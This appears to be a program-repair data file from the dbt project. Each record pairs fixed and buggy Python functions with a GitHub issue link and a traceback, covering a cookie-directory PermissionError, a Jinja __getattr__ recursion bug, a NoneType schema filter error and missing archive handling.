File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def set_cookie(self):
user = {"id": str(uuid.uuid4())}
dbt.clients.system.make_directory(self.cookie_dir)
with open(self.cookie_path, "w") as fh:
yaml.dump(user, fh)
return user
|
def set_cookie(self):
cookie_dir = os.path.dirname(COOKIE_PATH)
user = {"id": str(uuid.uuid4())}
dbt.clients.system.make_directory(cookie_dir)
with open(COOKIE_PATH, "w") as fh:
yaml.dump(user, fh)
return user
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def get_cookie(self):
if not os.path.isfile(self.cookie_path):
user = self.set_cookie()
else:
with open(self.cookie_path, "r") as fh:
try:
user = yaml.safe_load(fh)
if user is None:
user = self.set_cookie()
except yaml.reader.ReaderError:
user = self.set_cookie()
return user
|
def get_cookie(self):
if not os.path.isfile(COOKIE_PATH):
user = self.set_cookie()
else:
with open(COOKIE_PATH, "r") as fh:
try:
user = yaml.safe_load(fh)
if user is None:
user = self.set_cookie()
except yaml.reader.ReaderError:
user = self.set_cookie()
return user
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def do_not_track():
global active_user
active_user = User(None)
|
def do_not_track():
global active_user
active_user = User()
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def initialize_tracking(cookie_dir):
global active_user
active_user = User(cookie_dir)
try:
active_user.initialize()
except Exception:
logger.debug("Got an exception trying to initialize tracking", exc_info=True)
active_user = User(None)
|
def initialize_tracking():
global active_user
active_user = User()
active_user.initialize()
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
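
All five diffs for this issue implement one idea: the cookie directory becomes an explicit argument, and any failure to create it (such as the PermissionError above on an unwritable `/.dbt`) downgrades the user to a non-tracking one instead of crashing. A minimal sketch of that fallback pattern, with hypothetical names:

import os
import uuid

class User:
    def __init__(self, cookie_dir):
        # cookie_dir=None means "do not track".
        self.cookie_dir = cookie_dir
        self.do_not_track = cookie_dir is None
        self.invocation_id = str(uuid.uuid4())

    def initialize(self):
        os.makedirs(self.cookie_dir, exist_ok=True)  # may raise PermissionError
        self.do_not_track = False

def initialize_tracking(cookie_dir):
    user = User(cookie_dir)
    try:
        user.initialize()
    except Exception:
        # e.g. PermissionError on a read-only filesystem: fall back silently.
        user = User(None)
    return user

# On a machine where "/" is not writable this prints True (tracking disabled).
print(initialize_tracking("/unwritable/.dbt").do_not_track)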
|
def create_macro_capture_env(node):
class ParserMacroCapture(jinja2.Undefined):
"""
This class sets up the parser to capture macros.
"""
def __init__(self, hint=None, obj=None, name=None, exc=None):
super(jinja2.Undefined, self).__init__()
self.node = node
self.name = name
self.package_name = node.get("package_name")
# jinja uses these for safety, so we have to override them.
# see https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py#L332-L339 # noqa
self.unsafe_callable = False
self.alters_data = False
def __deepcopy__(self, memo):
path = os.path.join(
self.node.get("root_path"), self.node.get("original_file_path")
)
logger.debug(
"A ParserMacroCapture has been deecopy()d, invalid reference "
'to "{}" in node {}.{} (source path: {})'.format(
self.name,
self.node.get("package_name"),
self.node.get("name"),
path,
)
)
dbt.exceptions.raise_compiler_error(
"dbt has detected at least one invalid reference in {}.{}. "
"Check logs for more information".format(
self.node.get("package_name"), self.node.get("name")
)
)
def __getattr__(self, name):
if name == "name" or _is_dunder_name(name):
raise AttributeError(
"'{}' object has no attribute '{}'".format(
type(self).__name__, name
)
)
self.package_name = self.name
self.name = name
return self
def __call__(self, *args, **kwargs):
return True
return ParserMacroCapture
|
def create_macro_capture_env(node):
class ParserMacroCapture(jinja2.Undefined):
"""
This class sets up the parser to capture macros.
"""
def __init__(self, hint=None, obj=None, name=None, exc=None):
super(jinja2.Undefined, self).__init__()
self.node = node
self.name = name
self.package_name = node.get("package_name")
def __getattr__(self, name):
# jinja uses these for safety, so we have to override them.
# see https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py#L332-L339 # noqa
if name in ["unsafe_callable", "alters_data"]:
return False
self.package_name = self.name
self.name = name
return self
def __call__(self, *args, **kwargs):
return True
return ParserMacroCapture
|
https://github.com/fishtown-analytics/dbt/issues/1080
|
(MainThread): maximum recursion depth exceeded in comparison
2018-10-22 16:36:31,926 (MainThread): Traceback (most recent call last):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 72, in main
results, succeeded = handle_and_check(args)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 117, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 172, in run_from_args
results = run_from_task(task, proj, parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 180, in run_from_task
result = task.run()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/task/run.py", line 26, in run
results = runner.run(query, ModelRunner)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 244, in run
return self.run_from_graph(Selector, Runner, query)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 197, in run_from_graph
manifest, linker = self.compile(self.project)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 186, in compile
return compiler.compile()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/compilation.py", line 241, in compile
manifest = dbt.loader.GraphLoader.load_all(self.project, all_projects)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 21, in load_all
nodes.update(loader.load_all(root_project, all_projects, macros))
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 86, in load_all
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 102, in load_project
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 67, in load_and_parse
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 95, in parse_sql_nodes
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base.py", line 125, in parse_node
schema_override = config.config.get('schema')
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 82, in config
self.in_model_config)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 50, in _merge
merged_config.copy(), config.copy()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/utils.py", line 251, in deep_merge
last = copy.deepcopy(lst.pop(len(lst)-1))
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 150, in deepcopy
y = copier(x, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 240, in _deepcopy_dict
y[deepcopy(key, memo)] = deepcopy(value, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 180, in deepcopy
y = _reconstruct(x, memo, *rv)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 281, in _reconstruct
if hasattr(y, '__setstate__'):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
[Previous line repeated 320 more times]
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 162, in __getattr__
if name in ['unsafe_callable', 'alters_data']:
RecursionError: maximum recursion depth exceeded in comparison
|
RecursionError
|
def __init__(self, hint=None, obj=None, name=None, exc=None):
super(jinja2.Undefined, self).__init__()
self.node = node
self.name = name
self.package_name = node.get("package_name")
# jinja uses these for safety, so we have to override them.
# see https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py#L332-L339 # noqa
self.unsafe_callable = False
self.alters_data = False
|
def __init__(self, hint=None, obj=None, name=None, exc=None):
super(jinja2.Undefined, self).__init__()
self.node = node
self.name = name
self.package_name = node.get("package_name")
|
https://github.com/fishtown-analytics/dbt/issues/1080
|
(MainThread): maximum recursion depth exceeded in comparison
2018-10-22 16:36:31,926 (MainThread): Traceback (most recent call last):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 72, in main
results, succeeded = handle_and_check(args)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 117, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 172, in run_from_args
results = run_from_task(task, proj, parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 180, in run_from_task
result = task.run()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/task/run.py", line 26, in run
results = runner.run(query, ModelRunner)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 244, in run
return self.run_from_graph(Selector, Runner, query)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 197, in run_from_graph
manifest, linker = self.compile(self.project)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 186, in compile
return compiler.compile()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/compilation.py", line 241, in compile
manifest = dbt.loader.GraphLoader.load_all(self.project, all_projects)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 21, in load_all
nodes.update(loader.load_all(root_project, all_projects, macros))
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 86, in load_all
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 102, in load_project
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 67, in load_and_parse
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 95, in parse_sql_nodes
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base.py", line 125, in parse_node
schema_override = config.config.get('schema')
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 82, in config
self.in_model_config)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 50, in _merge
merged_config.copy(), config.copy()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/utils.py", line 251, in deep_merge
last = copy.deepcopy(lst.pop(len(lst)-1))
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 150, in deepcopy
y = copier(x, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 240, in _deepcopy_dict
y[deepcopy(key, memo)] = deepcopy(value, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 180, in deepcopy
y = _reconstruct(x, memo, *rv)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 281, in _reconstruct
if hasattr(y, '__setstate__'):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
[Previous line repeated 320 more times]
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 162, in __getattr__
if name in ['unsafe_callable', 'alters_data']:
RecursionError: maximum recursion depth exceeded in comparison
|
RecursionError
|
def __getattr__(self, name):
if name == "name" or _is_dunder_name(name):
raise AttributeError(
"'{}' object has no attribute '{}'".format(type(self).__name__, name)
)
self.package_name = self.name
self.name = name
return self
|
def __getattr__(self, name):
# jinja uses these for safety, so we have to override them.
# see https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py#L332-L339 # noqa
if name in ["unsafe_callable", "alters_data"]:
return False
self.package_name = self.name
self.name = name
return self
|
https://github.com/fishtown-analytics/dbt/issues/1080
|
(MainThread): maximum recursion depth exceeded in comparison
2018-10-22 16:36:31,926 (MainThread): Traceback (most recent call last):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 72, in main
results, succeeded = handle_and_check(args)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 117, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 172, in run_from_args
results = run_from_task(task, proj, parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 180, in run_from_task
result = task.run()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/task/run.py", line 26, in run
results = runner.run(query, ModelRunner)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 244, in run
return self.run_from_graph(Selector, Runner, query)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 197, in run_from_graph
manifest, linker = self.compile(self.project)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 186, in compile
return compiler.compile()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/compilation.py", line 241, in compile
manifest = dbt.loader.GraphLoader.load_all(self.project, all_projects)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 21, in load_all
nodes.update(loader.load_all(root_project, all_projects, macros))
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 86, in load_all
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 102, in load_project
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 67, in load_and_parse
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 95, in parse_sql_nodes
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base.py", line 125, in parse_node
schema_override = config.config.get('schema')
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 82, in config
self.in_model_config)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 50, in _merge
merged_config.copy(), config.copy()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/utils.py", line 251, in deep_merge
last = copy.deepcopy(lst.pop(len(lst)-1))
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 150, in deepcopy
y = copier(x, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 240, in _deepcopy_dict
y[deepcopy(key, memo)] = deepcopy(value, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 180, in deepcopy
y = _reconstruct(x, memo, *rv)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 281, in _reconstruct
if hasattr(y, '__setstate__'):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
[Previous line repeated 320 more times]
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 162, in __getattr__
if name in ['unsafe_callable', 'alters_data']:
RecursionError: maximum recursion depth exceeded in comparison
|
RecursionError
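
The recursion happens because `copy.deepcopy` rebuilds the object without running `__init__`, so `name` is missing from the new instance's `__dict__`; reading `self.name` inside `__getattr__` then re-enters `__getattr__` forever. The fix raises AttributeError for `name` and for dunder lookups (such as the `__setstate__` probe deepcopy makes). A minimal self-contained sketch of the guard:

import copy

class Capture:
    def __init__(self):
        self.name = "seed"

    def __getattr__(self, name):
        # Without this guard, an instance rebuilt by deepcopy (empty
        # __dict__) recurses: __getattr__ -> self.name -> __getattr__ -> ...
        if name == "name" or (name.startswith("__") and name.endswith("__")):
            raise AttributeError(name)
        self.package_name = self.name
        self.name = name
        return self

copy.deepcopy(Capture())  # no RecursionError with the guard in place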
|
def get_catalog(cls, profile, project_cfg, manifest):
try:
table = cls.run_operation(
profile, project_cfg, manifest, GET_CATALOG_OPERATION_NAME
)
finally:
cls.release_connection(profile, GET_CATALOG_OPERATION_NAME)
results = table.where(_filter_schemas(manifest))
return results
|
def get_catalog(cls, profile, project_cfg, manifest):
try:
table = cls.run_operation(
profile, project_cfg, manifest, GET_CATALOG_OPERATION_NAME
)
finally:
cls.release_connection(profile, GET_CATALOG_OPERATION_NAME)
schemas = list({node.schema.lower() for node in manifest.nodes.values()})
results = table.where(lambda r: r["table_schema"].lower() in schemas)
return results
|
https://github.com/fishtown-analytics/dbt/issues/980
|
from svv_table_info
DEBUG:dbt:SQL status: SELECT in 2.90 seconds
DEBUG:dbt:On get_catalog_data: ROLLBACK
DEBUG:dbt:Flushing usage events
Encountered an error:
INFO:dbt:Encountered an error:
'NoneType' object has no attribute 'lower'
INFO:dbt:'NoneType' object has no attribute 'lower'
DEBUG:dbt:Traceback (most recent call last):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/main.py", line 72, in main
results, succeeded = handle_and_check(args)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/main.py", line 117, in handle_and_check
task, res = run_from_args(parsed)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/main.py", line 172, in run_from_args
results = run_from_task(task, proj, parsed)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/main.py", line 180, in run_from_task
result = task.run()
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/task/generate.py", line 217, in run
results = adapter.get_catalog(profile, self.project.cfg, manifest)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/adapters/default/impl.py", line 838, in get_catalog
results = table.where(lambda r: r['table_schema'].lower() in schemas)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/agate/table/where.py", line 25, in where
if test(row):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/adapters/default/impl.py", line 838, in <lambda>
results = table.where(lambda r: r['table_schema'].lower() in schemas)
AttributeError: 'NoneType' object has no attribute 'lower'
|
AttributeError
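
The crash comes from catalog rows whose `table_schema` is NULL, which agate yields as None, so `.lower()` blows up. The merged code hides the filter behind `_filter_schemas(manifest)`, whose body is not shown in this diff; a None-safe predicate in the same spirit (taking a plain list of schema names for the sketch) might look like:

def _filter_schemas(schemas):
    """Build a row predicate that tolerates NULL table_schema values."""
    lowered = {s.lower() for s in schemas}

    def predicate(row):
        schema = row["table_schema"]
        # NULL schemas come back as None; never call .lower() on them.
        return schema is not None and schema.lower() in lowered

    return predicate

rows = [{"table_schema": "analytics"}, {"table_schema": None}]
keep = _filter_schemas(["ANALYTICS"])
print([r for r in rows if keep(r)])  # [{'table_schema': 'analytics'}]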
|
def print_start_line(node, schema_name, index, total):
if node.get("resource_type") == NodeType.Model:
print_model_start_line(node, schema_name, index, total)
if node.get("resource_type") == NodeType.Test:
print_test_start_line(node, schema_name, index, total)
if node.get("resource_type") == NodeType.Archive:
print_archive_start_line(node, index, total)
|
def print_start_line(node, schema_name, index, total):
if node.get("resource_type") == NodeType.Model:
print_model_start_line(node, schema_name, index, total)
if node.get("resource_type") == NodeType.Test:
print_test_start_line(node, schema_name, index, total)
|
https://github.com/fishtown-analytics/dbt/issues/252
|
(venv)Tristans-MacBook-Pro:analytics tristan$ dbt archive
Traceback (most recent call last):
File "/Users/tristan/dev/venv/bin/dbt", line 6, in <module>
exec(compile(open(__file__).read(), __file__, 'exec'))
File "/Users/tristan/dev/dbt/scripts/dbt", line 8, in <module>
dbt.main.main(sys.argv[1:])
File "/Users/tristan/dev/dbt/dbt/main.py", line 38, in main
return handle(args)
File "/Users/tristan/dev/dbt/dbt/main.py", line 52, in handle
res = run_from_args(parsed)
File "/Users/tristan/dev/dbt/dbt/main.py", line 85, in run_from_args
return task.run()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 19, in run
self.compile()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 15, in compile
compiled = compiler.compile_archives()
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 412, in compile_archives
sql = archive.compile()
File "/Users/tristan/dev/dbt/dbt/model.py", line 705, in compile
query = archival.compile()
File "/Users/tristan/dev/dbt/dbt/archival.py", line 41, in compile
self.schema.create_table(target_schema, target_table, dest_columns, sort=updated_at, dist=unique_key)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 257, in create_table
self.execute_and_handle_permissions(sql, table)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 159, in execute_and_handle_permissions
return self.execute(query)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 137, in execute
raise e
File "/Users/tristan/dev/dbt/dbt/schema.py", line 129, in execute
cursor.execute(sql)
psycopg2.NotSupportedError: column "_sdc_source_key__id || '|' || _sdc_level_0_id" specified as distkey/sortkey is not in the table "mongo.accounts__duplicate_authors"
|
psycopg2.NotSupportedError
|
def print_result_line(result, schema_name, index, total):
node = result.node
if node.get("resource_type") == NodeType.Model:
print_model_result_line(result, schema_name, index, total)
elif node.get("resource_type") == NodeType.Test:
print_test_result_line(result, schema_name, index, total)
elif node.get("resource_type") == NodeType.Archive:
print_archive_result_line(result, index, total)
|
def print_result_line(result, schema_name, index, total):
node = result.node
if node.get("resource_type") == NodeType.Model:
print_model_result_line(result, schema_name, index, total)
elif node.get("resource_type") == NodeType.Test:
print_test_result_line(result, schema_name, index, total)
|
https://github.com/fishtown-analytics/dbt/issues/252
|
(venv)Tristans-MacBook-Pro:analytics tristan$ dbt archive
Traceback (most recent call last):
File "/Users/tristan/dev/venv/bin/dbt", line 6, in <module>
exec(compile(open(__file__).read(), __file__, 'exec'))
File "/Users/tristan/dev/dbt/scripts/dbt", line 8, in <module>
dbt.main.main(sys.argv[1:])
File "/Users/tristan/dev/dbt/dbt/main.py", line 38, in main
return handle(args)
File "/Users/tristan/dev/dbt/dbt/main.py", line 52, in handle
res = run_from_args(parsed)
File "/Users/tristan/dev/dbt/dbt/main.py", line 85, in run_from_args
return task.run()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 19, in run
self.compile()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 15, in compile
compiled = compiler.compile_archives()
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 412, in compile_archives
sql = archive.compile()
File "/Users/tristan/dev/dbt/dbt/model.py", line 705, in compile
query = archival.compile()
File "/Users/tristan/dev/dbt/dbt/archival.py", line 41, in compile
self.schema.create_table(target_schema, target_table, dest_columns, sort=updated_at, dist=unique_key)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 257, in create_table
self.execute_and_handle_permissions(sql, table)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 159, in execute_and_handle_permissions
return self.execute(query)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 137, in execute
raise e
File "/Users/tristan/dev/dbt/dbt/schema.py", line 129, in execute
cursor.execute(sql)
psycopg2.NotSupportedError: column "_sdc_source_key__id || '|' || _sdc_level_0_id" specified as distkey/sortkey is not in the table "mongo.accounts__duplicate_authors"
|
psycopg2.NotSupportedError
|
def execute_archive(profile, node, context):
adapter = get_adapter(profile)
node_cfg = node.get("config", {})
source_columns = adapter.get_columns_in_table(
profile, node_cfg.get("source_schema"), node_cfg.get("source_table")
)
if len(source_columns) == 0:
source_schema = node_cfg.get("source_schema")
source_table = node_cfg.get("source_table")
raise RuntimeError(
'Source table "{}"."{}" does not exist'.format(source_schema, source_table)
)
dest_columns = source_columns + [
dbt.schema.Column("valid_from", "timestamp", None),
dbt.schema.Column("valid_to", "timestamp", None),
dbt.schema.Column("scd_id", "text", None),
dbt.schema.Column("dbt_updated_at", "timestamp", None),
]
adapter.create_table(
profile,
schema=node_cfg.get("target_schema"),
table=node_cfg.get("target_table"),
columns=dest_columns,
sort="dbt_updated_at",
dist="scd_id",
)
# TODO move this to inject_runtime_config, generate archive SQL
# in wrap step. can't do this right now because we actually need
# to inspect status of the schema at runtime and archive requires
# a lot of information about the schema to generate queries.
template_ctx = context.copy()
template_ctx.update(node_cfg)
select = dbt.clients.jinja.get_rendered(
dbt.templates.SCDArchiveTemplate, template_ctx
)
insert_stmt = dbt.templates.ArchiveInsertTemplate().wrap(
schema=node_cfg.get("target_schema"),
table=node_cfg.get("target_table"),
query=select,
unique_key=node_cfg.get("unique_key"),
)
node["wrapped_sql"] = dbt.clients.jinja.get_rendered(insert_stmt, template_ctx)
result = adapter.execute_model(profile=profile, model=node)
return result
|
